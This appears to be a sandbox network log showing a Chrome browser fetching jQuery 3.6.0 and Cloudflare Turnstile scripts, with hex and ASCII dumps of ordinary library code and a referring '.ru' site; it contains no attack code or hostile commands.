                                                                  2025-01-13 21:52:28 UTC358OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                  Host: code.jquery.com
                                                                  Connection: keep-alive
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  Accept: */*
                                                                  Sec-Fetch-Site: none
                                                                  Sec-Fetch-Mode: cors
                                                                  Sec-Fetch-Dest: empty
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2025-01-13 21:52:28 UTC613INHTTP/1.1 200 OK
                                                                  Connection: close
                                                                  Content-Length: 89501
                                                                  Server: nginx
                                                                  Content-Type: application/javascript; charset=utf-8
                                                                  Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                  ETag: "28feccc0-15d9d"
                                                                  Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                  Access-Control-Allow-Origin: *
                                                                  Cross-Origin-Resource-Policy: cross-origin
                                                                  Via: 1.1 varnish, 1.1 varnish
                                                                  Accept-Ranges: bytes
                                                                  Date: Mon, 13 Jan 2025 21:52:28 GMT
                                                                  Age: 2289675
                                                                  X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740076-EWR
                                                                  X-Cache: HIT, HIT
                                                                  X-Cache-Hits: 2774, 1
                                                                  X-Timer: S1736805149.909943,VS0,VE1
                                                                  Vary: Accept-Encoding
                                                                  2025-01-13 21:52:28 UTC16384INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                  Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                  2025-01-13 21:52:29 UTC16384INData Raw: 2c 64 5d 3b 62 72 65 61 6b 7d 7d 65 6c 73 65 20 69 66 28 70 26 26 28 64 3d 73 3d 28 72 3d 28 69 3d 28 6f 3d 28 61 3d 65 29 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6f 5b 61 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 29 5b 68 5d 7c 7c 5b 5d 29 5b 30 5d 3d 3d 3d 6b 26 26 72 5b 31 5d 29 2c 21 31 3d 3d 3d 64 29 77 68 69 6c 65 28 61 3d 2b 2b 73 26 26 61 26 26 61 5b 6c 5d 7c 7c 28 64 3d 73 3d 30 29 7c 7c 75 2e 70 6f 70 28 29 29 69 66 28 28 78 3f 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 66 3a 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 29 26 26 2b 2b 64 26 26 28 70 26 26 28 28 69 3d 28 6f 3d 61 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c
                                                                  Data Ascii: ,d];break}}else if(p&&(d=s=(r=(i=(o=(a=e)[S]||(a[S]={}))[a.uniqueID]||(o[a.uniqueID]={}))[h]||[])[0]===k&&r[1]),!1===d)while(a=++s&&a&&a[l]||(d=s=0)||u.pop())if((x?a.nodeName.toLowerCase()===f:1===a.nodeType)&&++d&&(p&&((i=(o=a[S]||(a[S]={}))[a.uniqueID]|
                                                                  2025-01-13 21:52:29 UTC16384INData Raw: 22 6d 73 2d 22 29 2e 72 65 70 6c 61 63 65 28 7a 2c 55 29 7d 76 61 72 20 56 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 31 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 39 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 21 2b 65 2e 6e 6f 64 65 54 79 70 65 7d 3b 66 75 6e 63 74 69 6f 6e 20 47 28 29 7b 74 68 69 73 2e 65 78 70 61 6e 64 6f 3d 53 2e 65 78 70 61 6e 64 6f 2b 47 2e 75 69 64 2b 2b 7d 47 2e 75 69 64 3d 31 2c 47 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 63 61 63 68 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3b 72 65 74 75 72 6e 20 74 7c 7c 28 74 3d 7b 7d 2c 56 28 65 29 26 26 28 65 2e 6e 6f 64 65 54 79 70 65 3f 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3d 74 3a 4f 62 6a 65 63 74 2e
                                                                  Data Ascii: "ms-").replace(z,U)}var V=function(e){return 1===e.nodeType||9===e.nodeType||!+e.nodeType};function G(){this.expando=S.expando+G.uid++}G.uid=1,G.prototype={cache:function(e){var t=e[this.expando];return t||(t={},V(e)&&(e.nodeType?e[this.expando]=t:Object.
                                                                  2025-01-13 21:52:29 UTC16384INData Raw: 72 5d 29 3b 65 6c 73 65 20 4c 65 28 65 2c 63 29 3b 72 65 74 75 72 6e 20 30 3c 28 61 3d 76 65 28 63 2c 22 73 63 72 69 70 74 22 29 29 2e 6c 65 6e 67 74 68 26 26 79 65 28 61 2c 21 66 26 26 76 65 28 65 2c 22 73 63 72 69 70 74 22 29 29 2c 63 7d 2c 63 6c 65 61 6e 44 61 74 61 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 2c 72 2c 69 3d 53 2e 65 76 65 6e 74 2e 73 70 65 63 69 61 6c 2c 6f 3d 30 3b 76 6f 69 64 20 30 21 3d 3d 28 6e 3d 65 5b 6f 5d 29 3b 6f 2b 2b 29 69 66 28 56 28 6e 29 29 7b 69 66 28 74 3d 6e 5b 59 2e 65 78 70 61 6e 64 6f 5d 29 7b 69 66 28 74 2e 65 76 65 6e 74 73 29 66 6f 72 28 72 20 69 6e 20 74 2e 65 76 65 6e 74 73 29 69 5b 72 5d 3f 53 2e 65 76 65 6e 74 2e 72 65 6d 6f 76 65 28 6e 2c 72 29 3a 53 2e 72 65 6d 6f 76 65 45 76 65
                                                                  Data Ascii: r]);else Le(e,c);return 0<(a=ve(c,"script")).length&&ye(a,!f&&ve(e,"script")),c},cleanData:function(e){for(var t,n,r,i=S.event.special,o=0;void 0!==(n=e[o]);o++)if(V(n)){if(t=n[Y.expando]){if(t.events)for(r in t.events)i[r]?S.event.remove(n,r):S.removeEve
                                                                  2025-01-13 21:52:29 UTC16384INData Raw: 53 2e 65 78 74 65 6e 64 28 7b 61 74 74 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 2c 6f 3d 65 2e 6e 6f 64 65 54 79 70 65 3b 69 66 28 33 21 3d 3d 6f 26 26 38 21 3d 3d 6f 26 26 32 21 3d 3d 6f 29 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 3f 53 2e 70 72 6f 70 28 65 2c 74 2c 6e 29 3a 28 31 3d 3d 3d 6f 26 26 53 2e 69 73 58 4d 4c 44 6f 63 28 65 29 7c 7c 28 69 3d 53 2e 61 74 74 72 48 6f 6f 6b 73 5b 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 7c 7c 28 53 2e 65 78 70 72 2e 6d 61 74 63 68 2e 62 6f 6f 6c 2e 74 65 73 74 28 74 29 3f 63 74 3a 76 6f 69 64 20 30 29 29 2c 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 75 6c 6c 3d 3d 3d 6e 3f 76 6f 69 64 20 53 2e 72 65 6d
                                                                  Data Ascii: S.extend({attr:function(e,t,n){var r,i,o=e.nodeType;if(3!==o&&8!==o&&2!==o)return"undefined"==typeof e.getAttribute?S.prop(e,t,n):(1===o&&S.isXMLDoc(e)||(i=S.attrHooks[t.toLowerCase()]||(S.expr.match.bool.test(t)?ct:void 0)),void 0!==n?null===n?void S.rem
                                                                  2025-01-13 21:52:29 UTC7581INData Raw: 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 69 2e 78 68 72 28 29 3b 69 66 28 72 2e 6f 70 65 6e 28 69 2e 74 79 70 65 2c 69 2e 75 72 6c 2c 69 2e 61 73 79 6e 63 2c 69 2e 75 73 65 72 6e 61 6d 65 2c 69 2e 70 61 73 73 77 6f 72 64 29 2c 69 2e 78 68 72 46 69 65 6c 64 73 29 66 6f 72 28 6e 20 69 6e 20 69 2e 78 68 72 46 69 65 6c 64 73 29 72 5b 6e 5d 3d 69 2e 78 68 72 46 69 65 6c 64 73 5b 6e 5d 3b 66 6f 72 28 6e 20 69 6e 20 69 2e 6d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 28 69 2e 6d 69 6d 65 54 79 70 65 29 2c 69 2e 63 72 6f 73 73 44 6f 6d 61 69 6e 7c 7c 65 5b 22 58 2d 52 65 71 75 65 73 74 65 64 2d 57 69 74 68 22 5d 7c 7c 28 65 5b 22 58 2d 52
                                                                  Data Ascii: :function(e,t){var n,r=i.xhr();if(r.open(i.type,i.url,i.async,i.username,i.password),i.xhrFields)for(n in i.xhrFields)r[n]=i.xhrFields[n];for(n in i.mimeType&&r.overrideMimeType&&r.overrideMimeType(i.mimeType),i.crossDomain||e["X-Requested-With"]||(e["X-R


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  15192.168.2.449761104.18.95.414435480C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-13 21:52:29 UTC383OUTGET /turnstile/v0/b/e0c90b6a3ed1/api.js HTTP/1.1
                                                                  Host: challenges.cloudflare.com
                                                                  Connection: keep-alive
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  Accept: */*
                                                                  Sec-Fetch-Site: none
                                                                  Sec-Fetch-Mode: cors
                                                                  Sec-Fetch-Dest: empty
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2025-01-13 21:52:29 UTC471INHTTP/1.1 200 OK
                                                                  Date: Mon, 13 Jan 2025 21:52:29 GMT
                                                                  Content-Type: application/javascript; charset=UTF-8
                                                                  Content-Length: 47521
                                                                  Connection: close
                                                                  accept-ranges: bytes
                                                                  last-modified: Wed, 08 Jan 2025 13:42:47 GMT
                                                                  cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                  access-control-allow-origin: *
                                                                  cross-origin-resource-policy: cross-origin
                                                                  Server: cloudflare
                                                                  CF-RAY: 90189d189cf60fa8-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  2025-01-13 21:52:29 UTC1369INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 57 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                                  Data Ascii: "use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);funct
                                                                  2025-01-13 21:52:29 UTC1369INData Raw: 74 28 65 29 7b 69 66 28 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 65 29 29 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 6a 74 28 65 2c 72 29 7b 76 61 72 20 6e 3d 65 3d 3d 6e 75 6c 6c 3f 6e 75 6c 6c 3a 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 7c 7c 65 5b 22 40 40 69 74 65 72 61 74 6f 72 22 5d 3b 69 66 28 6e 21 3d 6e 75 6c 6c 29 7b 76 61 72 20 6f 3d 5b 5d 2c 63 3d 21 30 2c 75 3d 21 31 2c 67 2c 68 3b 74 72 79 7b 66 6f 72 28 6e 3d 6e 2e 63 61 6c 6c 28 65 29 3b 21 28 63 3d 28 67 3d 6e 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 29 26 26 28 6f 2e 70 75 73 68 28 67 2e 76 61 6c 75 65 29 2c 21 28 72 26 26 6f 2e 6c 65 6e 67 74 68 3d 3d 3d 72 29 29 3b 63 3d 21 30 29
                                                                  Data Ascii: t(e){if(Array.isArray(e))return e}function jt(e,r){var n=e==null?null:typeof Symbol!="undefined"&&e[Symbol.iterator]||e["@@iterator"];if(n!=null){var o=[],c=!0,u=!1,g,h;try{for(n=n.call(e);!(c=(g=n.next()).done)&&(o.push(g.value),!(r&&o.length===r));c=!0)
                                                                  2025-01-13 21:52:29 UTC1369INData Raw: 5d 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 6c 28 70 29 7b 69 66 28 6f 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 47 65 6e 65 72 61 74 6f 72 20 69 73 20 61 6c 72 65 61 64 79 20 65 78 65 63 75 74 69 6e 67 2e 22 29 3b 66 6f 72 28 3b 67 26 26 28 67 3d 30 2c 70 5b 30 5d 26 26 28 6e 3d 30 29 29 2c 6e 3b 29 74 72 79 7b 69 66 28 6f 3d 31 2c 63 26 26 28 75 3d 70 5b 30 5d 26 32 3f 63 2e 72 65 74 75 72 6e 3a 70 5b 30 5d 3f 63 2e 74 68 72 6f 77 7c 7c 28 28 75 3d 63 2e 72 65 74 75 72 6e 29 26 26 75 2e 63 61 6c 6c 28 63 29 2c 30 29 3a 63 2e 6e 65 78 74 29 26 26 21 28 75 3d 75 2e 63 61 6c 6c 28 63 2c 70 5b 31 5d 29 29 2e 64 6f 6e 65 29 72 65 74 75 72 6e 20 75 3b 73 77 69 74 63 68 28 63 3d 30 2c 75 26 26 28 70 3d 5b 70 5b 30 5d 26 32 2c 75 2e 76 61 6c
                                                                  Data Ascii: ])}}function l(p){if(o)throw new TypeError("Generator is already executing.");for(;g&&(g=0,p[0]&&(n=0)),n;)try{if(o=1,c&&(u=p[0]&2?c.return:p[0]?c.throw||((u=c.return)&&u.call(c),0):c.next)&&!(u=u.call(c,p[1])).done)return u;switch(c=0,u&&(p=[p[0]&2,u.val
                                                                  2025-01-13 21:52:29 UTC1369INData Raw: 29 29 3b 76 61 72 20 50 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 2c 65 2e 4c 49 47 48 54 3d 22 6c 69 67 68 74 22 2c 65 2e 44 41 52 4b 3d 22 64 61 72 6b 22 7d 29 28 50 65 7c 7c 28 50 65 3d 7b 7d 29 29 3b 76 61 72 20 49 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 56 45 52 49 46 59 49 4e 47 3d 22 76 65 72 69 66 79 69 6e 67 22 2c 65 2e 56 45 52 49 46 59 49 4e 47 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 3d 22 76 65 72 69 66 79 69 6e 67 2d 68 61 76 69 6e 67 2d 74 72 6f 75 62 6c 65 73 22 2c 65 2e 56 45 52 49 46 59 49 4e 47 5f 4f 56 45 52 52 55 4e 3d 22 76 65 72 69 66 79 69 6e 67 2d 6f 76 65 72 72 75 6e 22 2c 65 2e 46 41 49 4c 55 52 45 5f 57 4f 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 3d 22 66 61 69
                                                                  Data Ascii: ));var Pe;(function(e){e.AUTO="auto",e.LIGHT="light",e.DARK="dark"})(Pe||(Pe={}));var Ie;(function(e){e.VERIFYING="verifying",e.VERIFYING_HAVING_TROUBLES="verifying-having-troubles",e.VERIFYING_OVERRUN="verifying-overrun",e.FAILURE_WO_HAVING_TROUBLES="fai
                                                                  2025-01-13 21:52:29 UTC1369INData Raw: 4f 4d 3d 22 63 75 73 74 6f 6d 22 7d 29 28 57 65 7c 7c 28 57 65 3d 7b 7d 29 29 3b 66 75 6e 63 74 69 6f 6e 20 4d 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 65 2e 69 6e 64 65 78 4f 66 28 72 29 21 3d 3d 2d 31 7d 66 75 6e 63 74 69 6f 6e 20 69 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 61 75 74 6f 22 2c 22 64 61 72 6b 22 2c 22 6c 69 67 68 74 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 6f 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 61 75 74 6f 22 2c 22 6e 65 76 65 72 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 63 74 28 65 29 7b 72 65 74 75 72 6e 20 65 3e 30 26 26 65 3c 39 65 35 7d 66 75 6e 63 74 69 6f 6e 20 75 74 28 65 29 7b 72 65 74 75 72 6e 20 65 3e 30 26 26 65 3c 33 36 65 34 7d 76 61 72 20 49 72 3d 2f 5e 5b 30 2d 39 41 2d 5a 61 2d 7a 5f 2d 5d 7b 33 2c
                                                                  Data Ascii: OM="custom"})(We||(We={}));function M(e,r){return e.indexOf(r)!==-1}function it(e){return M(["auto","dark","light"],e)}function ot(e){return M(["auto","never"],e)}function ct(e){return e>0&&e<9e5}function ut(e){return e>0&&e<36e4}var Ir=/^[0-9A-Za-z_-]{3,
                                                                  2025-01-13 21:52:29 UTC1369INData Raw: 2c 65 72 3d 22 2e 67 2d 72 65 63 61 70 74 63 68 61 22 2c 68 74 3d 22 63 66 5f 63 68 61 6c 6c 65 6e 67 65 5f 72 65 73 70 6f 6e 73 65 22 2c 5f 74 3d 22 63 66 2d 74 75 72 6e 73 74 69 6c 65 2d 72 65 73 70 6f 6e 73 65 22 2c 62 74 3d 22 67 2d 72 65 63 61 70 74 63 68 61 2d 72 65 73 70 6f 6e 73 65 22 2c 74 72 3d 38 65 33 2c 45 74 3d 22 70 72 69 76 61 74 65 2d 74 6f 6b 65 6e 22 2c 72 72 3d 33 2c 6e 72 3d 35 30 30 2c 61 72 3d 35 30 30 2c 59 3d 22 22 3b 76 61 72 20 4e 72 3d 5b 22 62 67 2d 62 67 22 2c 22 64 61 2d 64 6b 22 2c 22 64 65 2d 64 65 22 2c 22 65 6c 2d 67 72 22 2c 22 6a 61 2d 6a 70 22 2c 22 6d 73 2d 6d 79 22 2c 22 72 75 2d 72 75 22 2c 22 73 6b 2d 73 6b 22 2c 22 73 6c 2d 73 69 22 2c 22 73 72 2d 62 61 22 2c 22 74 6c 2d 70 68 22 2c 22 75 6b 2d 75 61 22 5d 2c 6b
                                                                  Data Ascii: ,er=".g-recaptcha",ht="cf_challenge_response",_t="cf-turnstile-response",bt="g-recaptcha-response",tr=8e3,Et="private-token",rr=3,nr=500,ar=500,Y="";var Nr=["bg-bg","da-dk","de-de","el-gr","ja-jp","ms-my","ru-ru","sk-sk","sl-si","sr-ba","tl-ph","uk-ua"],k
                                                                  2025-01-13 21:52:29 UTC1369INData Raw: 62 6f 73 65 4c 61 6e 67 75 61 67 65 2c 6e 3d 65 2e 69 73 53 6d 61 6c 6c 65 72 46 65 65 64 62 61 63 6b 2c 6f 3d 65 2e 69 73 4d 6f 64 65 72 61 74 65 6c 79 56 65 72 62 6f 73 65 3b 72 65 74 75 72 6e 20 6e 26 26 72 3f 22 35 34 30 70 78 22 3a 6e 26 26 6f 3f 22 35 30 30 70 78 22 3a 6e 3f 22 34 38 30 70 78 22 3a 72 3f 22 36 35 30 70 78 22 3a 6f 3f 22 35 39 30 70 78 22 3a 22 35 37 30 70 78 22 7d 3b 66 75 6e 63 74 69 6f 6e 20 42 65 28 65 29 7b 69 66 28 65 3d 3d 3d 76 6f 69 64 20 30 29 74 68 72 6f 77 20 6e 65 77 20 52 65 66 65 72 65 6e 63 65 45 72 72 6f 72 28 22 74 68 69 73 20 68 61 73 6e 27 74 20 62 65 65 6e 20 69 6e 69 74 69 61 6c 69 73 65 64 20 2d 20 73 75 70 65 72 28 29 20 68 61 73 6e 27 74 20 62 65 65 6e 20 63 61 6c 6c 65 64 22 29 3b 72 65 74 75 72 6e 20 65 7d
                                                                  Data Ascii: boseLanguage,n=e.isSmallerFeedback,o=e.isModeratelyVerbose;return n&&r?"540px":n&&o?"500px":n?"480px":r?"650px":o?"590px":"570px"};function Be(e){if(e===void 0)throw new ReferenceError("this hasn't been initialised - super() hasn't been called");return e}
                                                                  2025-01-13 21:52:29 UTC1369INData Raw: 30 3b 72 65 74 75 72 6e 20 71 65 3d 66 75 6e 63 74 69 6f 6e 28 6f 29 7b 69 66 28 6f 3d 3d 3d 6e 75 6c 6c 7c 7c 21 63 72 28 6f 29 29 72 65 74 75 72 6e 20 6f 3b 69 66 28 74 79 70 65 6f 66 20 6f 21 3d 22 66 75 6e 63 74 69 6f 6e 22 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 53 75 70 65 72 20 65 78 70 72 65 73 73 69 6f 6e 20 6d 75 73 74 20 65 69 74 68 65 72 20 62 65 20 6e 75 6c 6c 20 6f 72 20 61 20 66 75 6e 63 74 69 6f 6e 22 29 3b 69 66 28 74 79 70 65 6f 66 20 72 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 29 7b 69 66 28 72 2e 68 61 73 28 6f 29 29 72 65 74 75 72 6e 20 72 2e 67 65 74 28 6f 29 3b 72 2e 73 65 74 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 72 65 74 75 72 6e 20 53 65 28 6f 2c 61 72 67 75 6d 65 6e 74 73 2c 63 65 28 74
                                                                  Data Ascii: 0;return qe=function(o){if(o===null||!cr(o))return o;if(typeof o!="function")throw new TypeError("Super expression must either be null or a function");if(typeof r!="undefined"){if(r.has(o))return r.get(o);r.set(o,c)}function c(){return Se(o,arguments,ce(t
                                                                  2025-01-13 21:52:29 UTC1369INData Raw: 75 6c 64 20 6e 6f 74 20 66 69 6e 64 20 54 75 72 6e 73 74 69 6c 65 20 73 63 72 69 70 74 20 74 61 67 2c 20 73 6f 6d 65 20 66 65 61 74 75 72 65 73 20 6d 61 79 20 6e 6f 74 20 62 65 20 61 76 61 69 6c 61 62 6c 65 22 2c 34 33 37 37 37 29 3b 76 61 72 20 72 3d 65 2e 73 72 63 2c 6e 3d 7b 6c 6f 61 64 65 64 41 73 79 6e 63 3a 21 31 2c 70 61 72 61 6d 73 3a 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 2c 73 72 63 3a 72 7d 3b 28 65 2e 61 73 79 6e 63 7c 7c 65 2e 64 65 66 65 72 29 26 26 28 6e 2e 6c 6f 61 64 65 64 41 73 79 6e 63 3d 21 30 29 3b 76 61 72 20 6f 3d 72 2e 73 70 6c 69 74 28 22 3f 22 29 3b 72 65 74 75 72 6e 20 6f 2e 6c 65 6e 67 74 68 3e 31 26 26 28 6e 2e 70 61 72 61 6d 73 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 28 6f 5b 31 5d 29 29
                                                                  Data Ascii: uld not find Turnstile script tag, some features may not be available",43777);var r=e.src,n={loadedAsync:!1,params:new URLSearchParams,src:r};(e.async||e.defer)&&(n.loadedAsync=!0);var o=r.split("?");return o.length>1&&(n.params=new URLSearchParams(o[1]))
                                                                  2025-01-13 21:52:29 UTC1369INData Raw: 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 3d 22 23 66 66 66 66 66 66 22 2c 45 2e 73 74 79 6c 65 2e 62 6f 72 64 65 72 52 61 64 69 75 73 3d 22 35 70 78 22 2c 45 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 22 30 70 78 22 2c 45 2e 73 74 79 6c 65 2e 74 6f 70 3d 22 30 70 78 22 2c 45 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 3d 22 68 69 64 64 65 6e 22 2c 45 2e 73 74 79 6c 65 2e 6d 61 72 67 69 6e 3d 22 30 70 78 20 61 75 74 6f 22 3b 76 61 72 20 53 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 66 72 61 6d 65 22 29 3b 53 2e 69 64 3d 22 22 2e 63 6f 6e 63 61 74 28 65 2c 22 2d 66 72 22 29 2c 53 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 72 63 22 2c 68 29 2c 53 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 61 6c 6c 6f 77 22
                                                                  Data Ascii: yle.backgroundColor="#ffffff",E.style.borderRadius="5px",E.style.left="0px",E.style.top="0px",E.style.overflow="hidden",E.style.margin="0px auto";var S=document.createElement("iframe");S.id="".concat(e,"-fr"),S.setAttribute("src",h),S.setAttribute("allow"


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  16192.168.2.449762104.18.94.414435480C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-13 21:52:29 UTC798OUTGET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/grybg/0x4AAAAAAA4pnGQDZ108QgTx/auto/fbE/normal/auto/ HTTP/1.1
                                                                  Host: challenges.cloudflare.com
                                                                  Connection: keep-alive
                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                  sec-ch-ua-mobile: ?0
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Upgrade-Insecure-Requests: 1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Sec-Fetch-Site: cross-site
                                                                  Sec-Fetch-Mode: navigate
                                                                  Sec-Fetch-Dest: iframe
                                                                  Referer: https://rfll.yordickyel.ru/
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2025-01-13 21:52:29 UTC1362INHTTP/1.1 200 OK
                                                                  Date: Mon, 13 Jan 2025 21:52:29 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 26635
                                                                  Connection: close
                                                                  cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                  permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                  content-security-policy: frame-src https://challenges.cloudflare.com/; base-uri 'self'
                                                                  cross-origin-embedder-policy: require-corp
                                                                  cross-origin-opener-policy: same-origin
                                                                  cross-origin-resource-policy: cross-origin
                                                                  origin-agent-cluster: ?1
